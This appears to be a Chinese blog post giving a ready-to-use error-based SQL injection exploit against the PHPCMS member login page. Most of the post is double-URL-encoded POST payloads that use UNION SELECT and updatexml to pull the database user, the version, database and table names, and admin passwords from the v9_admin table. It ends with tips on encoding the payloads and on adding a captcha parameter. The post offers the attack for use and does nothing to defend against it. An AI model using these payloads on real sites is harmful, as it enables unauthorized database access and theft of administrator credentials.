index.php?m=member&c=index&a=login 后缀

username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2buser())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523 爆管理账户密码

username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bversion())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523

版本:username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bversion())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523

库:username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bdatabases())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523

爆出表:updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema='phpcms' limit 0,1),0x5e24),1)

只要url编码一下,替换一下就ok了

在updatexml里必须只能有三个值

所以爆帐号密码要一个一个爆

如:updatexml(1,concat(0x5e24,(select password from v9_admin limit 0,1),0x5e24),1)

以此类推

备注(有一些需要验证码登陆的请添加&code=5fnuv&dosubmit=%E7%99%BB%E5%BD%95)

最新文章

  1. WPF 画心2.0版之元旦快乐
  2. Linux 下curl模拟Http 的get or post请求
  3. rop框架中@ServiceMethod注解属性
  4. 学习微信小程序之css16常见布局
  5. github 预览html
  6. 如何在Android中添加系统服务
  7. 基于android的语音识别
  8. .4-Vue源码之数据劫持(2)
  9. WPF学习之路一
  10. 关于node的前端项目编译时内存溢出问题
  11. Good Bye 2017 D. New Year and Arbitrary Arrangement
  12. Ansible第二章:palybook介绍与使用--小白博客
  13. 换工作之后需要兼容ie8的我
  14. ActiveQt框架 禁止弹出ActiveX控件交互提示
  15. spoj1433 KPSUM
  16. centos7下安装docker(13docker存储)
  17. ETL : kettle Spoon 转换 + 作业
  18. GIT——总结.1-
  19. GeoHash核心原理解析及java代码实现(转)
  20. Spring cloud 之Feign基本使用

热门文章

  1. jsRender 循环for 和props
  2. Jquery-input获取单选框选择的按钮
  3. C#-WinForm-弹窗提示框-如何知道用户点击的是哪个按钮?
  4. EF(Entity Framework)发生错误”正在创建模型,此时不可使用上下文“的解决办法。 正在创建模型,此时不可使用上下文。如果在 OnModelCreating 方法内使用上下文或如果多个线程同时访问同一上下文实例,可能引发此异常。请注意不保证 DbContext 的实例成员和相关类是线程安全的。 临时解决了这个问题,在Context的构造函数中,禁用了自动初始化:
  5. Code::Blocks的魅力
  6. 【BZOJ-4435】Juice Junctions 最小割树(分治+最小割)+Hash
  7. eclipse中xml文件不能自动提示的解决办法
  8. 【poj2942】 Knights of the Round Table
  9. Android程序设计-圆形图片的实现
  10. Bzoj4300 绝世好题